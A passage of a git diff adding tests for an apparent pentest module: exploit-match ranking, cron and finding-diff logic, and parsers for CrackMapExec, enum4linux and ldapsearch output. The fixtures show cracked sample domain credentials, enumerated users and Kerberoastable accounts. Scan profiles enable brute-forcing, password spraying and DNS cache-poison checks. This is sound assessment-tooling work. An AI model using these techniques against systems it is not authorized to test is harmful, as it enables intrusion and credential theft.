+      expect(updated!.status).toBe("verified")
+      expect(updated!.verifiedAt).toBeDefined()
+    })
+
+    test("returns null for non-existent match", async () => {
+      const updated = await ExploitStorage.updateMatchStatus(
+        "nonexistent",
+        "verified",
+        { storage: "memory" }
+      )
+
+      expect(updated).toBeNull()
+    })
+  })
+
+  describe("deleteMatch", () => {
+    test("deletes existing match", async () => {
+      await ExploitStorage.saveMatch({
+        id: "match_delete",
+        findingID: "finding_123",
+        source: "exploit-db",
+        exploitID: "1",
+        title: "Test",
+        confidence: "low",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      const deleted = await ExploitStorage.deleteMatch("match_delete", { storage: "memory" })
+      expect(deleted).toBe(true)
+
+      const retrieved = await ExploitStorage.getMatch("match_delete", { storage: "memory" })
+      expect(retrieved).toBeNull()
+    })
+
+    test("returns false for non-existent match", async () => {
+      const deleted = await ExploitStorage.deleteMatch("nonexistent", { storage: "memory" })
+      expect(deleted).toBe(false)
+    })
+  })
+
+  describe("memoryCount", () => {
+    test("returns correct counts", async () => {
+      expect(ExploitStorage.memoryCount().matches).toBe(0)
+
+      await ExploitStorage.saveMatch({
+        id: "m1",
+        findingID: "f1",
+        source: "exploit-db",
+        exploitID: "1",
+        title: "Test",
+        confidence: "low",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      expect(ExploitStorage.memoryCount().matches).toBe(1)
+    })
+  })
+})
+
+describe("ExploitMatcher", () => {
+  describe("buildQueries", () => {
+    test("builds queries from service", () => {
+      const finding = {
+        id: "finding_test",
+        sessionID: "session_1",
+        title: "HTTP Service Exposed",
+        description: "HTTP server detected",
+        severity: "info" as const,
+        status: "open" as const,
+        target: "192.168.1.1",
+        port: 80,
+        service: "http",
+        createdAt: Date.now(),
+      }
+
+      const queries = ExploitMatcher.buildQueries(finding)
+
+      expect(queries).toContain("http")
+    })
+
+    test("builds queries from port", () => {
+      const finding = {
+        id: "finding_test",
+        sessionID: "session_1",
+        title: "SSH Service Exposed",
+        description: "SSH server detected",
+        severity: "info" as const,
+        status: "open" as const,
+        target: "192.168.1.1",
+        port: 22,
+        createdAt: Date.now(),
+      }
+
+      const queries = ExploitMatcher.buildQueries(finding)
+
+      expect(queries.some((q) => q.includes("ssh") || q.includes("openssh"))).toBe(true)
+    })
+
+    test("extracts version from evidence", () => {
+      const finding = {
+        id: "finding_test",
+        sessionID: "session_1",
+        title: "Apache HTTP Server",
+        description: "Apache web server detected",
+        severity: "info" as const,
+        status: "open" as const,
+        target: "192.168.1.1",
+        port: 80,
+        service: "apache",
+        evidence: "Server: Apache/2.4.49 version: 2.4.49",
+        createdAt: Date.now(),
+      }
+
+      const queries = ExploitMatcher.buildQueries(finding)
+
+      expect(queries.some((q) => q.includes("2.4.49"))).toBe(true)
+    })
+  })
+
+  describe("rankMatches", () => {
+    test("ranks by confidence first", () => {
+      const matches: ExploitTypes.ExploitMatch[] = [
+        {
+          id: "m1",
+          findingID: "f1",
+          source: "metasploit",
+          exploitID: "mod1",
+          title: "Low confidence",
+          confidence: "low",
+          matchReason: "Service match",
+          createdAt: Date.now(),
+          status: "suggested",
+        },
+        {
+          id: "m2",
+          findingID: "f1",
+          source: "exploit-db",
+          exploitID: "50383",
+          title: "High confidence",
+          confidence: "high",
+          matchReason: "CVE match",
+          cve: ["CVE-2021-41773"],
+          createdAt: Date.now(),
+          status: "suggested",
+        },
+      ]
+
+      const ranked = ExploitMatcher.rankMatches(matches)
+
+      expect(ranked[0].confidence).toBe("high")
+      expect(ranked[1].confidence).toBe("low")
+    })
+
+    test("ranks by MSF rank within same confidence", () => {
+      const matches: ExploitTypes.ExploitMatch[] = [
+        {
+          id: "m1",
+          findingID: "f1",
+          source: "metasploit",
+          exploitID: "mod1",
+          title: "Normal rank",
+          confidence: "medium",
+          rank: "normal",
+          matchReason: "Service match",
+          createdAt: Date.now(),
+          status: "suggested",
+        },
+        {
+          id: "m2",
+          findingID: "f1",
+          source: "metasploit",
+          exploitID: "mod2",
+          title: "Excellent rank",
+          confidence: "medium",
+          rank: "excellent",
+          matchReason: "Service match",
+          createdAt: Date.now(),
+          status: "suggested",
+        },
+      ]
+
+      const ranked = ExploitMatcher.rankMatches(matches)
+
+      expect(ranked[0].rank).toBe("excellent")
+      expect(ranked[1].rank).toBe("normal")
+    })
+
+    test("prefers CVE matches when rank is equal", () => {
+      const matches: ExploitTypes.ExploitMatch[] = [
+        {
+          id: "m1",
+          findingID: "f1",
+          source: "exploit-db",
+          exploitID: "1",
+          title: "No CVE",
+          confidence: "medium",
+          matchReason: "Service match",
+          createdAt: Date.now(),
+          status: "suggested",
+        },
+        {
+          id: "m2",
+          findingID: "f1",
+          source: "exploit-db",
+          exploitID: "2",
+          title: "Has CVEs",
+          confidence: "medium",
+          matchReason: "Service match",
+          cve: ["CVE-2021-1234", "CVE-2021-5678"],
+          createdAt: Date.now(),
+          status: "suggested",
+        },
+      ]
+
+      const ranked = ExploitMatcher.rankMatches(matches)
+
+      expect(ranked[0].cve?.length).toBe(2)
+    })
+  })
+})
diff --git a/packages/opencode/test/pentest/monitoring.test.ts b/packages/opencode/test/pentest/monitoring.test.ts
new file mode 100644
index 00000000000..984c2bc2295
--- /dev/null
+++ b/packages/opencode/test/pentest/monitoring.test.ts
@@ -0,0 +1,355 @@
+/**
+ * @fileoverview Monitoring Tests
+ *
+ * Tests for continuous monitoring functionality.
+ */
+
+import { describe, test, expect } from "bun:test"
+import { CronParser } from "../../src/pentest/monitoring/cron-parser"
+import { DiffEngine } from "../../src/pentest/monitoring/diff"
+import type { PentestTypes } from "../../src/pentest/types"
+
+// Helper to create test findings
+function createFinding(overrides: Partial<PentestTypes.Finding> = {}): PentestTypes.Finding {
+  return {
+    id: `finding_${Math.random().toString(36).slice(2)}`,
+    sessionID: "session_test",
+    scanID: "scan_test",
+    title: "Test Finding",
+    description: "Test description",
+    severity: "medium",
+    status: "open",
+    target: "192.168.1.1",
+    port: 80,
+    protocol: "tcp",
+    service: "http",
+    createdAt: Date.now(),
+    ...overrides,
+  }
+}
+
+describe("CronParser", () => {
+  describe("parse", () => {
+    test("parses wildcard expression", () => {
+      const parts = CronParser.parse("* * * * *")
+
+      expect(parts.minute.length).toBe(60) // 0-59
+      expect(parts.hour.length).toBe(24) // 0-23
+      expect(parts.dayOfMonth.length).toBe(31) // 1-31
+      expect(parts.month.length).toBe(12) // 1-12
+      expect(parts.dayOfWeek.length).toBe(7) // 0-6
+    })
+
+    test("parses specific values", () => {
+      const parts = CronParser.parse("0 0 1 1 0")
+
+      expect(parts.minute).toEqual([0])
+      expect(parts.hour).toEqual([0])
+      expect(parts.dayOfMonth).toEqual([1])
+      expect(parts.month).toEqual([1])
+      expect(parts.dayOfWeek).toEqual([0])
+    })
+
+    test("parses ranges", () => {
+      const parts = CronParser.parse("0-5 9-17 * * *")
+
+      expect(parts.minute).toEqual([0, 1, 2, 3, 4, 5])
+      expect(parts.hour).toEqual([9, 10, 11, 12, 13, 14, 15, 16, 17])
+    })
+
+    test("parses steps", () => {
+      const parts = CronParser.parse("*/15 */2 * * *")
+
+      expect(parts.minute).toEqual([0, 15, 30, 45])
+      expect(parts.hour).toEqual([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22])
+    })
+
+    test("parses lists", () => {
+      const parts = CronParser.parse("0,30 9,12,18 * * *")
+
+      expect(parts.minute).toEqual([0, 30])
+      expect(parts.hour).toEqual([9, 12, 18])
+    })
+
+    test("parses combined expressions", () => {
+      const parts = CronParser.parse("0,30 9-17 1-15 * 1-5")
+
+      expect(parts.minute).toEqual([0, 30])
+      expect(parts.hour.length).toBe(9) // 9-17
+      expect(parts.dayOfMonth.length).toBe(15) // 1-15
+      expect(parts.dayOfWeek).toEqual([1, 2, 3, 4, 5])
+    })
+
+    test("throws on invalid expression", () => {
+      expect(() => CronParser.parse("* * *")).toThrow()
+      expect(() => CronParser.parse("* * * * * *")).toThrow()
+    })
+  })
+
+  describe("nextRun", () => {
+    test("calculates next minute for * * * * *", () => {
+      const now = new Date()
+      now.setSeconds(0, 0)
+      const next = CronParser.nextRun("* * * * *", now.getTime())
+
+      const nextDate = new Date(next)
+      expect(nextDate.getTime()).toBeGreaterThan(now.getTime())
+      expect(nextDate.getTime() - now.getTime()).toBeLessThanOrEqual(60_000)
+    })
+
+    test("calculates next hour for 0 * * * *", () => {
+      const now = new Date()
+      now.setMinutes(30, 0, 0)
+      const next = CronParser.nextRun("0 * * * *", now.getTime())
+
+      const nextDate = new Date(next)
+      expect(nextDate.getMinutes()).toBe(0)
+      expect(nextDate.getHours()).toBe((now.getHours() + 1) % 24)
+    })
+
+    test("calculates midnight for 0 0 * * *", () => {
+      const now = new Date()
+      now.setHours(12, 0, 0, 0)
+      const next = CronParser.nextRun("0 0 * * *", now.getTime())
+
+      const nextDate = new Date(next)
+      expect(nextDate.getHours()).toBe(0)
+      expect(nextDate.getMinutes()).toBe(0)
+      expect(nextDate.getDate()).toBe(now.getDate() + 1)
+    })
+
+    test("handles specific time correctly", () => {
+      const now = new Date()
+      now.setHours(8, 0, 0, 0)
+      const next = CronParser.nextRun("30 9 * * *", now.getTime())
+
+      const nextDate = new Date(next)
+      expect(nextDate.getHours()).toBe(9)
+      expect(nextDate.getMinutes()).toBe(30)
+    })
+  })
+
+  describe("validate", () => {
+    test("validates correct expressions", () => {
+      expect(CronParser.validate("* * * * *").valid).toBe(true)
+      expect(CronParser.validate("0 0 * * *").valid).toBe(true)
+      expect(CronParser.validate("*/15 9-17 * * 1-5").valid).toBe(true)
+    })
+
+    test("invalidates incorrect expressions", () => {
+      expect(CronParser.validate("* * *").valid).toBe(false)
+      expect(CronParser.validate("invalid").valid).toBe(false)
+    })
+  })
+
+  describe("describe", () => {
+    test("describes common patterns", () => {
+      expect(CronParser.describe("* * * * *")).toBe("Every minute")
+      expect(CronParser.describe("0 * * * *")).toBe("Every hour")
+      expect(CronParser.describe("0 0 * * *")).toBe("Daily at midnight")
+      expect(CronParser.describe("*/15 * * * *")).toBe("Every 15 minutes")
+    })
+  })
+})
+
+describe("DiffEngine", () => {
+  describe("fingerprint", () => {
+    test("creates consistent fingerprint for same finding", () => {
+      const finding = createFinding({
+        title: "SQL Injection",
+        target: "192.168.1.1",
+        port: 80,
+        service: "http",
+        severity: "critical",
+      })
+
+      const fp1 = DiffEngine.fingerprint(finding)
+      const fp2 = DiffEngine.fingerprint(finding)
+
+      expect(fp1.hash).toBe(fp2.hash)
+    })
+
+    test("creates different fingerprints for different findings", () => {
+      const finding1 = createFinding({ title: "SQL Injection", target: "192.168.1.1" })
+      const finding2 = createFinding({ title: "XSS Vulnerability", target: "192.168.1.1" })
+
+      const fp1 = DiffEngine.fingerprint(finding1)
+      const fp2 = DiffEngine.fingerprint(finding2)
+
+      expect(fp1.hash).not.toBe(fp2.hash)
+    })
+
+    test("normalizes title for comparison", () => {
+      const finding1 = createFinding({ title: "SQL Injection" })
+      const finding2 = createFinding({ title: "sql injection" })
+      const finding3 = createFinding({ title: "  SQL Injection  " })
+
+      const fp1 = DiffEngine.fingerprint(finding1)
+      const fp2 = DiffEngine.fingerprint(finding2)
+      const fp3 = DiffEngine.fingerprint(finding3)
+
+      expect(fp1.hash).toBe(fp2.hash)
+      expect(fp1.hash).toBe(fp3.hash)
+    })
+
+    test("normalizes target for comparison", () => {
+      const finding1 = createFinding({ target: "example.com" })
+      const finding2 = createFinding({ target: "EXAMPLE.COM" })
+      const finding3 = createFinding({ target: "example.com/" })
+
+      const fp1 = DiffEngine.fingerprint(finding1)
+      const fp2 = DiffEngine.fingerprint(finding2)
+      const fp3 = DiffEngine.fingerprint(finding3)
+
+      expect(fp1.hash).toBe(fp2.hash)
+      expect(fp1.hash).toBe(fp3.hash)
+    })
+  })
+
+  describe("compare", () => {
+    test("identifies new findings", () => {
+      const previous = [createFinding({ id: "f1", title: "Finding 1" })]
+      const current = [
+        createFinding({ id: "f1", title: "Finding 1" }),
+        createFinding({ id: "f2", title: "Finding 2" }),
+      ]
+
+      const diff = DiffEngine.compare(previous, current)
+
+      expect(diff.newFindings).toHaveLength(1)
+      expect(diff.newFindings[0]).toBe("f2")
+      expect(diff.unchangedFindings).toHaveLength(1)
+      expect(diff.resolvedFindings).toHaveLength(0)
+    })
+
+    test("identifies resolved findings", () => {
+      const previous = [
+        createFinding({ id: "f1", title: "Finding 1" }),
+        createFinding({ id: "f2", title: "Finding 2" }),
+      ]
+      const current = [createFinding({ id: "f1", title: "Finding 1" })]
+
+      const diff = DiffEngine.compare(previous, current)
+
+      expect(diff.resolvedFindings).toHaveLength(1)
+      expect(diff.resolvedFindings[0]).toBe("f2")
+      expect(diff.unchangedFindings).toHaveLength(1)
+      expect(diff.newFindings).toHaveLength(0)
+    })
+
+    test("identifies unchanged findings", () => {
+      const previous = [createFinding({ id: "f1", title: "Finding 1" })]
+      const current = [createFinding({ id: "f1_new", title: "Finding 1" })] // Different ID, same fingerprint
+
+      const diff = DiffEngine.compare(previous, current)
+
+      expect(diff.unchangedFindings).toHaveLength(1)
+      expect(diff.newFindings).toHaveLength(0)
+      expect(diff.resolvedFindings).toHaveLength(0)
+    })
+
+    test("handles empty previous findings", () => {
+      const previous: PentestTypes.Finding[] = []
+      const current = [
+        createFinding({ id: "f1", title: "Finding 1" }),
+        createFinding({ id: "f2", title: "Finding 2" }),
+      ]
+
+      const diff = DiffEngine.compare(previous, current)
+
+      expect(diff.newFindings).toHaveLength(2)
+      expect(diff.unchangedFindings).toHaveLength(0)
+      expect(diff.resolvedFindings).toHaveLength(0)
+      expect(diff.totalPrevious).toBe(0)
+      expect(diff.totalCurrent).toBe(2)
+    })
+
+    test("handles empty current findings", () => {
+      const previous = [
+        createFinding({ id: "f1", title: "Finding 1" }),
+        createFinding({ id: "f2", title: "Finding 2" }),
+      ]
+      const current: PentestTypes.Finding[] = []
+
+      const diff = DiffEngine.compare(previous, current)
+
+      expect(diff.resolvedFindings).toHaveLength(2)
+      expect(diff.unchangedFindings).toHaveLength(0)
+      expect(diff.newFindings).toHaveLength(0)
+      expect(diff.totalPrevious).toBe(2)
+      expect(diff.totalCurrent).toBe(0)
+    })
+
+    test("handles mixed changes", () => {
+      const previous = [
+        createFinding({ id: "f1", title: "Finding 1" }),
+        createFinding({ id: "f2", title: "Finding 2" }),
+        createFinding({ id: "f3", title: "Finding 3" }),
+      ]
+      const current = [
+        createFinding({ id: "f1", title: "Finding 1" }), // Unchanged
+        createFinding({ id: "f4", title: "Finding 4" }), // New
+        createFinding({ id: "f5", title: "Finding 5" }), // New
+      ]
+
+      const diff = DiffEngine.compare(previous, current)
+
+      expect(diff.unchangedFindings).toHaveLength(1)
+      expect(diff.newFindings).toHaveLength(2)
+      expect(diff.resolvedFindings).toHaveLength(2) // f2 and f3
+    })
+  })
+
+  describe("summarizeSeverity", () => {
+    test("calculates severity summary correctly", () => {
+      const findings = [
+        createFinding({ severity: "critical" }),
+        createFinding({ severity: "critical" }),
+        createFinding({ severity: "high" }),
+        createFinding({ severity: "medium" }),
+        createFinding({ severity: "medium" }),
+        createFinding({ severity: "medium" }),
+        createFinding({ severity: "low" }),
+        createFinding({ severity: "info" }),
+      ]
+
+      const summary = DiffEngine.summarizeSeverity(findings)
+
+      expect(summary.critical).toBe(2)
+      expect(summary.high).toBe(1)
+      expect(summary.medium).toBe(3)
+      expect(summary.low).toBe(1)
+      expect(summary.info).toBe(1)
+      expect(summary.total).toBe(8)
+    })
+
+    test("handles empty findings", () => {
+      const summary = DiffEngine.summarizeSeverity([])
+
+      expect(summary.critical).toBe(0)
+      expect(summary.high).toBe(0)
+      expect(summary.medium).toBe(0)
+      expect(summary.low).toBe(0)
+      expect(summary.info).toBe(0)
+      expect(summary.total).toBe(0)
+    })
+  })
+
+  describe("filterBySeverity", () => {
+    test("filters by minimum severity", () => {
+      const findings = [
+        createFinding({ severity: "critical" }),
+        createFinding({ severity: "high" }),
+        createFinding({ severity: "medium" }),
+        createFinding({ severity: "low" }),
+        createFinding({ severity: "info" }),
+      ]
+
+      expect(DiffEngine.filterBySeverity(findings, "critical")).toHaveLength(1)
+      expect(DiffEngine.filterBySeverity(findings, "high")).toHaveLength(2)
+      expect(DiffEngine.filterBySeverity(findings, "medium")).toHaveLength(3)
+      expect(DiffEngine.filterBySeverity(findings, "low")).toHaveLength(4)
+      expect(DiffEngine.filterBySeverity(findings, "info")).toHaveLength(5)
+    })
+  })
+})
diff --git a/packages/opencode/test/pentest/netscan.test.ts b/packages/opencode/test/pentest/netscan.test.ts
new file mode 100644
index 00000000000..063967d90fe
--- /dev/null
+++ b/packages/opencode/test/pentest/netscan.test.ts
@@ -0,0 +1,999 @@
+/**
+ * @fileoverview Network Scanner Tests
+ *
+ * Tests for network infrastructure scanning including
+ * SMB, DNS, SNMP, LDAP, AD, and credential testing.
+ */
+
+import { describe, test, expect, beforeEach, afterEach } from "bun:test"
+import {
+  NetScanTypes,
+  NetScanStorage,
+  NetScanProfiles,
+  CrackMapExecParser,
+  Enum4linuxParser,
+  LdapsearchParser,
+  PasswordSpray,
+  DEFAULT_CREDENTIALS,
+} from "../../src/pentest/netscan"
+
+describe("CrackMapExecParser", () => {
+  const smbOutput = `SMB         192.168.1.10    445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:CORP.LOCAL) (signing:True) (SMBv1:False)
+SMB         192.168.1.10    445    DC01             [+] CORP.LOCAL\\admin:Password123 (Pwn3d!)
+SMB         192.168.1.10    445    DC01             [+] Enumerated shares`
+
+  const ldapOutput = `LDAP        192.168.1.10    389    DC01             [*] Windows Server 2019 (name:DC01) (domain:corp.local)
+LDAP        192.168.1.10    389    DC01             [+] CORP.LOCAL\\ldapuser:ldappass`
+
+  const winrmOutput = `WINRM       192.168.1.10    5985   DC01             [*] http://192.168.1.10:5985/wsman
+WINRM       192.168.1.10    5985   DC01             [+] CORP.LOCAL\\admin:Password123 (Pwn3d!)`
+
+  describe("parse", () => {
+    test("parses SMB output correctly", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+
+      expect(results.hosts.length).toBeGreaterThan(0)
+      expect(results.hosts[0].host).toBe("192.168.1.10")
+      expect(results.hosts[0].protocol).toBe("smb")
+    })
+
+    test("extracts credentials from output", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+
+      expect(results.credentials.length).toBeGreaterThan(0)
+      expect(results.credentials.some((c) => c.username === "admin")).toBe(true)
+      expect(results.credentials.some((c) => c.isAdmin === true)).toBe(true)
+    })
+
+    test("initializes shares array", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+
+      expect(Array.isArray(results.shares)).toBe(true)
+    })
+
+    test("parses LDAP output correctly", () => {
+      const results = CrackMapExecParser.parse(ldapOutput)
+
+      expect(results.hosts.length).toBeGreaterThan(0)
+      expect(results.hosts[0].protocol).toBe("ldap")
+    })
+
+    test("parses WinRM output correctly", () => {
+      const results = CrackMapExecParser.parse(winrmOutput)
+
+      expect(results.hosts.length).toBeGreaterThan(0)
+      expect(results.credentials.some((c) => c.isAdmin === true)).toBe(true)
+    })
+
+    test("detects SMB signing status", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+
+      expect(results.hosts.some((h) => h.signing === true)).toBe(true)
+    })
+
+    test("handles empty output", () => {
+      const results = CrackMapExecParser.parse("")
+
+      expect(results.hosts.length).toBe(0)
+      expect(results.credentials.length).toBe(0)
+    })
+  })
+
+  describe("parseLine", () => {
+    test("parses individual CME line", () => {
+      const line = CrackMapExecParser.parseLine(
+        "SMB         192.168.1.10    445    DC01             [+] CORP.LOCAL\\admin:Password123"
+      )
+
+      expect(line).not.toBeNull()
+      expect(line!.protocol).toBe("smb")
+      expect(line!.host).toBe("192.168.1.10")
+      expect(line!.port).toBe(445)
+      expect(line!.status).toBe("success")
+    })
+
+    test("returns null for invalid lines", () => {
+      const line = CrackMapExecParser.parseLine("invalid line")
+      expect(line).toBeNull()
+    })
+  })
+
+  describe("conversion functions", () => {
+    test("toNetworkHosts converts results to hosts", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+      const hosts = CrackMapExecParser.toNetworkHosts(results)
+
+      expect(hosts.length).toBeGreaterThan(0)
+      expect(hosts[0].ip).toBe("192.168.1.10")
+    })
+
+    test("toCredentials converts results to credentials", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+      const creds = CrackMapExecParser.toCredentials(results)
+
+      expect(creds.length).toBeGreaterThan(0)
+      expect(creds.some((c) => c.username === "admin")).toBe(true)
+    })
+
+    test("toSMBShares converts results to shares array", () => {
+      const results = CrackMapExecParser.parse(smbOutput)
+      const shares = CrackMapExecParser.toSMBShares(results)
+
+      expect(Array.isArray(shares)).toBe(true)
+    })
+  })
+})
+
+describe("Enum4linuxParser", () => {
+  const enum4linuxOutput = `
+ =========================================
+|    Target Information                  |
+ =========================================
+Target : 192.168.1.10
+
+ ====================================
+|    Share Enumeration on 192.168.1.10    |
+ ====================================
+[*] Enumerating shares
+	NETLOGON        Disk      Logon server share
+	SYSVOL          Disk      Logon server share
+
+ ====================================
+|    Users on 192.168.1.10 via RID cycling    |
+ ====================================
+[*] Enumerating users via RID cycling
+user:[Administrator] rid:[500]
+user:[Guest] rid:[501]
+user:[john.doe] rid:[1104]
+
+ ====================================
+|    Groups on 192.168.1.10    |
+ ====================================
+group:[Domain Admins] rid:[512]
+group:[Domain Users] rid:[513]
+
+ ====================================
+|    Password Policy on 192.168.1.10    |
+ ====================================
+[+] Password Info:
+Minimum password length: 7
+Password history length: 24
+Account Lockout Threshold: 5
+`
+
+  describe("parse", () => {
+    test("parses enum4linux output correctly", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+
+      expect(results.host).toBe("192.168.1.10")
+    })
+
+    test("extracts shares", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+
+      expect(results.shares.length).toBeGreaterThan(0)
+      expect(results.shares.some((s) => s.name === "NETLOGON")).toBe(true)
+    })
+
+    test("extracts users", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+
+      expect(results.users.length).toBeGreaterThan(0)
+      expect(results.users.some((u) => u.username === "Administrator")).toBe(true)
+      expect(results.users.some((u) => u.username === "john.doe")).toBe(true)
+    })
+
+    test("extracts groups", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+
+      expect(results.groups.length).toBeGreaterThan(0)
+      expect(results.groups.some((g) => g.name === "Domain Admins")).toBe(true)
+    })
+
+    test("extracts password policy", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+
+      expect(results.passwordPolicy).toBeDefined()
+      expect(results.passwordPolicy!.minLength).toBe(7)
+      expect(results.passwordPolicy!.lockoutThreshold).toBe(5)
+    })
+
+    test("handles empty output", () => {
+      const results = Enum4linuxParser.parse("")
+
+      expect(results.shares.length).toBe(0)
+      expect(results.users.length).toBe(0)
+      expect(results.groups.length).toBe(0)
+    })
+  })
+
+  describe("conversion functions", () => {
+    test("toADUsers converts results to AD users", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+      const users = Enum4linuxParser.toADUsers(results)
+
+      expect(users.length).toBeGreaterThan(0)
+      expect(users.some((u) => u.samAccountName === "Administrator")).toBe(true)
+    })
+
+    test("toADGroups converts results to AD groups", () => {
+      const results = Enum4linuxParser.parse(enum4linuxOutput)
+      const groups = Enum4linuxParser.toADGroups(results)
+
+      expect(groups.length).toBeGreaterThan(0)
+      expect(groups.some((g) => g.samAccountName === "Domain Admins")).toBe(true)
+    })
+  })
+})
+
+describe("LdapsearchParser", () => {
+  const ldifOutput = `# extended LDIF
+#
+# LDAPv3
+# base <DC=corp,DC=local> with scope subtree
+# filter: (objectClass=user)
+
+# Administrator, Users, corp.local
+dn: CN=Administrator,CN=Users,DC=corp,DC=local
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: Administrator
+sAMAccountName: Administrator
+userPrincipalName: Administrator@corp.local
+memberOf: CN=Domain Admins,CN=Users,DC=corp,DC=local
+adminCount: 1
+userAccountControl: 512
+
+# john.doe, Users, corp.local
+dn: CN=john.doe,CN=Users,DC=corp,DC=local
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: john.doe
+sAMAccountName: john.doe
+userPrincipalName: john.doe@corp.local
+servicePrincipalName: HTTP/webserver.corp.local
+userAccountControl: 4194304
+
+# search result
+search: 2
+result: 0 Success
+`
+
+  describe("parse", () => {
+    test("parses LDIF output correctly", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+
+      expect(results.entries.length).toBe(2)
+    })
+
+    test("extracts entry attributes", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+
+      const admin = results.entries.find((e) => e.dn.includes("Administrator"))
+      expect(admin).toBeDefined()
+      expect(admin!.attributes["samaccountname"]?.[0]).toBe("Administrator")
+      expect(admin!.attributes["admincount"]?.[0]).toBe("1")
+    })
+
+    test("extracts multi-valued attributes", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+
+      const admin = results.entries.find((e) => e.dn.includes("Administrator"))
+      expect(admin!.attributes["memberof"]).toBeDefined()
+    })
+
+    test("detects users with SPNs (Kerberoastable)", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+
+      const john = results.entries.find((e) => e.dn.includes("john.doe"))
+      expect(john!.attributes["serviceprincipalname"]).toBeDefined()
+    })
+
+    test("handles empty output", () => {
+      const results = LdapsearchParser.parse("")
+
+      expect(results.entries.length).toBe(0)
+    })
+
+    test("handles output with no entries", () => {
+      const noEntries = `# extended LDIF
+# LDAPv3
+# search result
+search: 2
+result: 0 Success
+`
+      const results = LdapsearchParser.parse(noEntries)
+
+      expect(results.entries.length).toBe(0)
+    })
+  })
+
+  describe("utility functions", () => {
+    test("getKerberoastableUsers finds users with SPNs", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+      const kerberoastable = LdapsearchParser.getKerberoastableUsers(results)
+
+      // john.doe has SPN but userAccountControl 4194304 means disabled
+      // so we check the function exists and runs
+      expect(Array.isArray(kerberoastable)).toBe(true)
+    })
+
+    test("getASRepRoastableUsers finds users without preauth", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+      const asrep = LdapsearchParser.getASRepRoastableUsers(results)
+
+      expect(Array.isArray(asrep)).toBe(true)
+    })
+
+    test("getPrivilegedUsers finds privileged group members", () => {
+      const results = LdapsearchParser.parse(ldifOutput)
+      const privileged = LdapsearchParser.getPrivilegedUsers(results)
+
+      expect(Array.isArray(privileged)).toBe(true)
+    })
+  })
+})
+
+describe("NetScanProfiles", () => {
+  test("has all required profiles", () => {
+    const profiles = NetScanProfiles.list()
+
+    expect(profiles.length).toBe(7)
+    expect(NetScanProfiles.get("discovery")).toBeDefined()
+    expect(NetScanProfiles.get("quick")).toBeDefined()
+    expect(NetScanProfiles.get("standard")).toBeDefined()
+    expect(NetScanProfiles.get("thorough")).toBeDefined()
+    expect(NetScanProfiles.get("stealth")).toBeDefined()
+    expect(NetScanProfiles.get("ad-focused")).toBeDefined()
+    expect(NetScanProfiles.get("custom")).toBeDefined()
+  })
+
+  describe("profile configurations", () => {
+    test("discovery profile enables basic AD enumeration", () => {
+      const profile = NetScanProfiles.get("discovery")!
+
+      expect(profile.modules.ad.enabled).toBe(true)
+      expect(profile.modules.ad.enumeration).toBe(true)
+      expect(profile.modules.ad.kerberoast).toBe(false)
+      expect(profile.modules.creds.enabled).toBe(false)
+    })
+
+    test("quick profile enables basic SMB and LDAP", () => {
+      const profile = NetScanProfiles.get("quick")!
+
+      expect(profile.modules.smb.enabled).toBe(true)
+      expect(profile.modules.ldap.enabled).toBe(true)
+      expect(profile.modules.creds.defaults).toBe(true)
+    })
+
+    test("standard profile enables core modules", () => {
+      const profile = NetScanProfiles.get("standard")!
+
+      expect(profile.modules.smb.enabled).toBe(true)
+      expect(profile.modules.ad.enabled).toBe(true)
+      expect(profile.modules.ad.kerberoast).toBe(true)
+      expect(profile.modules.ldap.enabled).toBe(true)
+      expect(profile.modules.dns.enabled).toBe(true)
+    })
+
+    test("thorough profile enables all modules", () => {
+      const profile = NetScanProfiles.get("thorough")!
+
+      expect(profile.modules.smb.enabled).toBe(true)
+      expect(profile.modules.smb.vulns).toBe(true)
+      expect(profile.modules.ad.enabled).toBe(true)
+      expect(profile.modules.ad.gpo).toBe(true)
+      expect(profile.modules.snmp.enabled).toBe(true)
+      expect(profile.modules.snmp.writeTest).toBe(true)
+      expect(profile.modules.dns.enabled).toBe(true)
+      expect(profile.modules.dns.cachePoison).toBe(true)
+      expect(profile.modules.ldap.enabled).toBe(true)
+      expect(profile.modules.creds.enabled).toBe(true)
+      expect(profile.modules.creds.brute).toBe(true)
+    })
+
+    test("stealth profile has low rate limits", () => {
+      const profile = NetScanProfiles.get("stealth")!
+
+      expect(profile.rateLimit).toBeLessThan(10)
+      expect(profile.maxThreads).toBeLessThan(5)
+    })
+
+    test("ad-focused profile focuses on AD testing", () => {
+      const profile = NetScanProfiles.get("ad-focused")!
+
+      expect(profile.modules.ad.enabled).toBe(true)
+      expect(profile.modules.ad.gpo).toBe(true)
+      expect(profile.modules.ldap.enabled).toBe(true)
+      expect(profile.modules.snmp.enabled).toBe(false)
+      expect(profile.modules.dns.enabled).toBe(false)
+    })
+  })
+
+  describe("createCustom", () => {
+    test("creates custom profile with overrides", () => {
+      const custom = NetScanProfiles.createCustom("standard", {
+        rateLimit: 5,
+      })
+
+      expect(custom.id).toBe("custom")
+      expect(custom.rateLimit).toBe(5)
+      expect(custom.modules.ad.enabled).toBe(true) // From base
+    })
+  })
+
+  describe("format", () => {
+    test("formats profile for display", () => {
